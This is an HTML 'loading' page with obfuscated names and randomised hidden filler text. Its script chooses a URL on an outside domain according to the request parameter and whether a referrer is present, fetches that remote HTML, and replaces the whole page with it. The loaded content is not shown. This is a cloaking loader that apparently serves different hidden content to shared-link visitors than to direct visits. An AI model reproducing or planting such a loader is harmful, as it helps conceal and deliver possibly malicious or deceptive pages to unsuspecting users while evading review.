<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Nz8R5j8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Nz8R5j8 .CVo5zPlYe5 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Nz8R5j8 .content {
            line-height: 50px;
            text-align: center
        }

        .Nz8R5j8 .img {
            width: 100%
        }

        .Nz8R5j8 .Q2WhJY {
            text-align: center
        }

        .Nz8R5j8 .Q2WhJY span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Nz8R5j8 .Q2WhJY span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Nz8R5j8 .Q2WhJY span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Nz8R5j8 .Q2WhJY span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Nz8R5j8 .Q2WhJY span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Nz8R5j8 .Q2WhJY span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Nz8R5j8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HAUYoRJYgyQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var K69Tqy = HAUYoRJYgyQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ K69Tqy +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ K69Tqy +".html?a=share";
		}
		
        hzuw7ejXy=url+"#"+new Date().getTime();
        hzuw7ejXy && function() {
            $.get(hzuw7ejXy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >CAyA1Qwhm7Dy3PgtdnssT9nmb35aPMHI39jQ9hwM6IfFTWeJAwECO2aL4vdDfGtc5sjBDOrSHtSL7jKKF4fOpVtge0t9sxo</ul>
<span style='display:none'>xxZF2MXribVP7ITPc7Dy4zsopucoJ4U3ln</span>
<p  style='display:none'>TRkwVkXH2tzfSqxMyrdAUzm1se</p><div class="Nz8R5j8">
    <div class="CVo5zPlYe5">
        <div class="Q2WhJY">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>IWJ50ujWbfmw6mNTePVhizRmUZvVSWlY7ACpxOXZaGwKSazqxJEE9Dp9FaQS7DO2dUXF8FYuF2hYaE</p>
<a  href='#' style='display:none'>RVYGOPjlaYqSQBgBQBHw6AwHy0yxBQpcMxsDiJONcuHGFl0HEtIlVg5i59indgaKJoY0Gixr6tqV1cl7BrjaOBNcKLZRTKGAl72h</a>
<span style='display:none'>tzSwbY1RbrdRck8Dbdzzy1sxUCEqidNvrXAS2uHT</span>
<a  href='#' style='display:none'>RVYGOPjlaYqSQBgBQBHw6AwHy0yxBQpcMxsDiJONcuHGFl0HEtIlVg5i59indgaKJoY0Gixr6tqV1cl7BrjaOBNcKLZRTKGAl72h</a></body>
</html>